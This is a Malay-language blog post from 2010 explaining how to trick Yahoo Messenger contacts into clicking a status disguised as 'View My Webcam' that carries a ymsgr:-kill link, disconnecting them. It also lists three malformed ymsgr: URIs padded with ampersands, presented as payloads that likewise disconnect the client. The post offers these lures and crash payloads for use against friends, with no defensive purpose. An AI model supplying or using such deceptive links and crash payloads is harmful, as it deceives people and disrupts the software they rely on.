Saturday, March 27, 2010

Mematikan Yahoo Messenger Dengan Status

Kali ini aku ingin berkongsikan satu trik baru yang boleh membuat orang yang mengklik status yahoo messenger anda terus disconnect. Trik ini cukup mudah, walaupun kita tidak dapat membuatkan yahoo messenger disconnected dengan menggunakan program boot, namun kita dapat juga membuat hanya dengan status yahoo messenger.

Trik status yahoo messenger yang mematikan ini hanya boleh digunakan untuk rakan yang berada di list yahoo messenger kita sahaja. Dengan memasangkan status yang menarik perhatian seperti View My Webcam, sudah pasti orang yang berada di dalam list yahoo messenger kita akan tertarik untuk klik status tersebut. Status yang diklik akan ditambahkan tatacara atau perintah untuk disconnectkan yahoo messenger yang dituliskan dengan kod ymsgr:-kill. Kata perintah ini akan kelihatan seperti link yang benar jika kita sedang online webcam dan pastinya ramai yang tertarik untuk mengkliknya.

Untuk cara menulis status yahoo messenger dengan menambahkan ymsgr:-kill pada View My Webcam anda boleh lihat pada gambar di bawah ini.

Untuk melihat status View My Webcam yang sudah diubah tadi sila lihat contoh gambar di bawah.

Bagi tatacara atau kata perintah yang lain anda boleh mencuba 3 lagi kod yang fungsinya sama iaitu disconnectkan yahoo messenger. 3 kod tersebut anda boleh dapatkan dibawah.


ymsgr:call?&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

ymsgr:getplugin?&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

ymsgr:chat?&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Nota : Jom la kita berwebcam beramai2. haha! =P

If you think this entry useful, just click Facebook Like button bellow :
blog comments powered by Disqus
Related Posts with Thumbnails